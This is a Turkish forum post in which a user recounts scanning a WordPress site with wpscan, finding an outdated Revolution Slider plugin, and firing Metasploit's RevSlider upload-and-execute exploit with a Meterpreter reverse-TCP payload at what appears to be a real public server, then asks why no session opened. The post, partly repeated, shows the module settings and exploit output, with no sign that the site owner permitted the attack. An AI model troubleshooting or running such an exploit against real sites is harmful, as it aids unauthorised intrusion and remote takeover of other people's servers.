Herkeze hayırlı akşamlar
ilk başlık için özürdilrim kısa bir şey aradım fakat sorunumu en iyi anlatabilecek başka bir başlık bulamadım.
bir site üzerinde wordpress taraması yaptım bir tane exploit buldum fakat bir hata alıyorum
aslında site üzerinde güncel omayan bir sürüm mevcut bu yüzden bunu değerlendirebileceğimi sandım.
# wpscan taraması
bu eklentiyi msfconsolede arattım
şunu buldum
# search revslider
sonra bunu seçip set ile RHOSTS'a site ipsini girdim, LHOST'ta benim local ipim vardı değiştirmedim
bir diğem sorum ise buradaki TARGETURI seçeneğine ilk tarama ile bulduğum seçeneğini girmem gerekirmi(********: http://ip/wp-content/plugins/revslider/)
sonrasında exploit diyerek çalıştırıyorum
"but no session was created" şekinde bir hata alıyorum sizce yanlış exploit mi, site güvenli mi, ben mi yanlış bir şey yaptım?
lütfen yardım edin şimdiden teşekkürler
ilk başlık için özürdilrim kısa bir şey aradım fakat sorunumu en iyi anlatabilecek başka bir başlık bulamadım.
bir site üzerinde wordpress taraması yaptım bir tane exploit buldum fakat bir hata alıyorum
aslında site üzerinde güncel omayan bir sürüm mevcut bu yüzden bunu değerlendirebileceğimi sandım.
# wpscan taraması
Kod:
[+] revslider
| ********: http://ip/wp-content/plugins/revslider/
| Last Updated: 2021-04-29T07:43:48.000Z
| [!] The version is out of date, the latest version is 6.4.11
|
| Found By: Urls In Homepage (Passive Detection)
| Confirmed By:
| Urls In 404 Page (Passive Detection)
| Comment (Passive Detection)
| Div Data Version (Passive Detection)
| **** Generator (Passive Detection)
|
| Version: 5.1.5 (100% confidence)
| Found By: Comment (Passive Detection)
| - https://ip/, Match: 'START REVOLUTION SLIDER 5.1.5'
| Confirmed By: Div Data Version (Passive Detection)
| - https://ip/, Match: '5.1.5'bu eklentiyi msfconsolede arattım
şunu buldum
# search revslider
Kod:
0 exploit/unix/webapp/wp_revslider_upload_execute 2014-11-26 excellent Yes WordPress RevSlider File Upload and Execute Vulnerabilitysonra bunu seçip set ile RHOSTS'a site ipsini girdim, LHOST'ta benim local ipim vardı değiştirmedim
Kod:
Module options (exploit/unix/webapp/wp_revslider_upload_execute):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS site_ip yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes The base path to the wordpress application
VHOST no HTTP server virtual host
Payload options (php/meterpreter_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.1.34 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 ThemePunch Revolution Slider (revslider) 3.0.95bir diğem sorum ise buradaki TARGETURI seçeneğine ilk tarama ile bulduğum seçeneğini girmem gerekirmi(********: http://ip/wp-content/plugins/revslider/)
sonrasında exploit diyerek çalıştırıyorum
Kod:
msf6 exploit(unix/webapp/wp_revslider_upload_execute) > exploit
[*] Exploiting target 185.###.42.###
[*] Started reverse TCP handler on 192.168.1.34:4444
[-] Exploit aborted due to failure: unexpected-reply: 185.###.42.###:80 - Unable to deploy payload, server returned 301
[*] Exploiting target 2###:c##0:#:##e::#
[*] Started reverse TCP handler on 192.168.1.34:4444
[-] Exploit aborted due to failure: unknown: ERROR
[*] Exploit completed, but no session was created.
msf6 exploit(unix/webapp/wp_revslider_upload_execute) >lütfen yardım edin şimdiden teşekkürler
Moderatör tarafında düzenlendi:
